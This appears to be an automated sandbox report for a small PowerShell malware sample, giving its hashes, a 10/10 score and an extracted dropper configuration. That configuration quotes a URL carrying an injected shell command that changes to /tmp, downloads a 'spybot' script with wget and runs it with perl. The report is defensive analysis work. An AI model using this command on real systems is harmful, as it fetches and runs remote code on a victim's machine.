Overview

overview

10

Static

static

10

612aa9a6b2...18.ps1

windows7-x64

3

612aa9a6b2...18.ps1

windows10-2004-x64

3

Sharing

Copy URL Twitter E-mail

General

  • Target

    612aa9a6b298220f5a8ef8c073dcdcd2_JaffaCakes118

  • Size

    3KB

  • MD5

    612aa9a6b298220f5a8ef8c073dcdcd2

  • SHA1

    a88cd32d3e4924d6ab00073f86426c6b448a4f17

  • SHA256

    05c4c46ece4f5fa3da73a24a35a25b2d28b6d92606746a6020b4f04b91d09934

  • SHA512

    51a7e9a9260445fe97544089fac06d7bc70994eb695baf20a0c6d0c04de29ac8df079681020b7638af4ba94ef671c5e16365f19a63da093203d0102839c442c1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://server/spy.gif?&cmd=cd /tmp;wget www.server.tld/spybot.txt; perl php.txt

Signatures

Files

  • 612aa9a6b298220f5a8ef8c073dcdcd2_JaffaCakes118
    .ps1